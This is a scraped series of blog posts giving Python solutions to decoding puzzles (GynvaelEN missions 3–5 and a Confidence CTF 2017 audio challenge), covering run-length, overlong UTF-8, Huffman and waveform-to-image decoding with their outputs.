<pre># <code>curl -v http://gynvael.vexillium.org/ext/thepicture/picture.image</code>
<output>Content-Encoding: <highlight>rle</highlight>
Content-Type: image/raw; <highlight>w=640,h=212,bpp=8</highlight></output>
# <code>cat mission_05.py</code>
<output>from struct import unpack
from PIL import Image
with open('picture.image') as f:
cdata = f.read()
ddata = []
for i in range(0, len(cdata), 2):
v = unpack('B', cdata[i + 1])[0] ^ 1
for _ in range(unpack('B', cdata[i])[0]):
ddata.append(v * 255)
image = Image.new('L', (640, 212))
image.putdata(ddata)
image.save('output.png')</output>
# <code>python mission_05.py</code></pre><img src='data:image/png;base64,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' /><br />
<br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=W7s5CWaw6I4 (1:20:57)<br />
<br />
<u>Reference</u><br />
<br />
https://en.wikipedia.org/wiki/Run-length_encodingUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-53170585788939623312017-05-28T22:03:00.000+02:002017-05-28T22:03:40.973+02:00# Confidence CTF 2k17: Starbyte - misc - 200 pts<br />
<pre># <code>cat starbyte.py</code>
<output>from PIL import Image, ImageDraw
import scipy.io.wavfile
import sys
import wave
inputfile = sys.argv[1]
wave_read_object = wave.open(inputfile, 'rb')
print 'Number of audio channels = ', wave_read_object.getnchannels()
print 'Sample width = ', wave_read_object.getsampwidth(), '(bytes)'
print 'Sampling frequency = ', wave_read_object.getframerate(), '(Hz)'
frames = wave_read_object.getnframes()
print 'Number of audio frames = ', frames
wave_read_object.close()
rate, data = scipy.io.wavfile.read(inputfile)
last_frame = -1
c = ''
r = ''
i = 0
for frame in data:
if frame > 90:
if last_frame != 1:
c += '1'
i += 1
last_frame = 1
elif frame > 23:
if last_frame != 0:
c += '0'
i += 1
last_frame = 0
else:
last_frame = -1
if i == 10:
nc = ''
for j in c:
nc = j + nc
r += chr(int(nc, 2))
c = ''
i = 0
r = r.split('\n')
image = Image.new('RGB', (1000, 1000), 'black')
draw = ImageDraw.Draw(image)
for line in r:
line = line.split()
if 'LINE' in line:
x1, y1, x2, y2 = map(int, line[1:])
draw.line([(x1, y1), (x2, y2)], 'green')
#elif 'REKT' in line:
# x1, y1, x2, y2 = map(int, line[1:])
# draw.rectangle([(x1, y1), (x2, y2)], None, 'green')
elif 'CRCL' in line:
x1, y1, rad = map(int, line[1:])
draw.arc([(x1 - rad, y1 - rad), (x1 + rad, y1 + rad)], 0, 360, 'green')
image.save('image.png')</output>
# <code>python starbyte.py starbyte.wav</code>
<output>Number of audio channels = 1
Sample width = 1 (bytes)
Sampling frequency = 44100 (Hz)
Number of audio frames = 3885808</output>
# <code>eog image.png</code></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-39445780243901804442017-05-27T19:06:00.000+02:002017-08-16T21:20:39.999+02:00# GynvaelEN mission 004<br />
<pre># <code>cat mission_04.py</code>
<output>def hex2bin(h):
binary = ''
for i in range(0, len(h), 2):
byte = u[i:i + 2]
binary += format(int(byte, 16), '08b')
return binary
def decode(u):
lu = len(u)
if lu == 2:
return u.decode('hex')
elif lu == 4:
binary = hex2bin(u)
r = binary[3:8] + binary[10:]
return chr(int(r, 2))
elif lu == 6:
binary = hex2bin(u)
r = binary[4:8] + binary[10:16] + binary[18:]
return chr(int(r, 2))
elif lu == 8:
binary = ''
binary = hex2bin(u)
r = binary[5:8] + binary[10:16] + binary[18:24] + binary[26:]
return chr(int(r, 2))
message = 'E0818F766572C1ACE081AFE081AEC1A7E080A0E08195C194E081862DE080B8E080A0F08081B7C1A17320C1B3F08081B563C1A820E081A1F08080A0E081A6F08081B5F08081AE20E081A6E081A5F08081A1C1B475E081B2E081A5F08080AE'
result = ''
i = 0
while i < len(message):
byte = int(message[i:i+2], 16)
binary = format(byte, '08b')
if binary[0] == '0':
j = 2
elif binary[0:3] == '110':
j = 4
elif binary[0:4] == '1110':
j = 6
elif binary[0:5] == '11110':
j = 8
u = message[i:i + j]
i += j
result += decode(u)
print result</output>
# <code>python mission_04.py</code>
<output>Overlong UTF-8 was such a fun feature.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)<br />
<br />
<u>Reference</u><br />
<br />
https://es.wikipedia.org/wiki/UTF-8#Codificaci.C3.B3n_de_los_caracteresUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-29211942447261847962017-05-14T01:39:00.000+02:002017-08-16T21:20:48.715+02:00# GynvaelEN mission 003<br />
<pre># <code>cat mission_03.py</code>
<output>import itertools
def base4to10(num):
result = 0
ln = len(num) - 1
for i in num:
result += int(i) * (4 ** ln)
ln -= 1
return result
def ascii_string(s):
for i in s:
if ord(i) < 32 or ord(i) > 126:
return False
return True
with open('huffman.code') as f:
bd = f.read()[:-1]
values = ['0', '1', '00', '01', '10', '11', '000', '001', '010', '011', '100', '101', '110', '111']
for i in itertools.permutations(values, 4):
tree = {
i[0]: '0',
i[1]: '1',
i[2]: '2',
i[3]: '3',
}
code = ''
result = ''
for d in bd:
code += d
if code in tree:
result += tree[code]
code = ''
try:
decv = base4to10(result)
hexv = hex(decv)[2:].replace('L', '')
ascv = hexv.decode('hex')
if ascii_string(ascv) and len(ascv) > 4:
print 'tree =', tree
print 'result =', result
print 'dec =', decv
print 'bytes =', hexv
print 'ascii =', ascv[::-1]
print
except:
pass
</output>
# <code>python mission_03.py</code>
<output>tree = {'11': '1', '0': '2', '100': '0', '101': '3'}
result = 3231202120213111211131203001031030012101202131112031322131303001323130113211313131312111030030013010300120213011212030012101031
dec = 26860288614901905570716094189682157357950360778336264927367113021610209076301
bytes = 3b6262756576304d30646275637a77307b71797777654c30713062716630644d
ascii = Md0fqb0q0Lewwyq{0wzcubd0M0veubb;
tree = {'11': '1', '0': '3', '100': '0', '101': '2'}
result = 2321303130312111311121302001021020013101303121113021233121202001232120112311212121213111020020012010200130312011313020013101021
dec = 21010374883428224108739011194252932925839770786883498221738205492211234141257
bytes = 2e7373657567204920747365726f66206e616d66667548206120736177207449
ascii = It was a Huffman forest I guess.
</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)Unknownnoreply@blogger.com0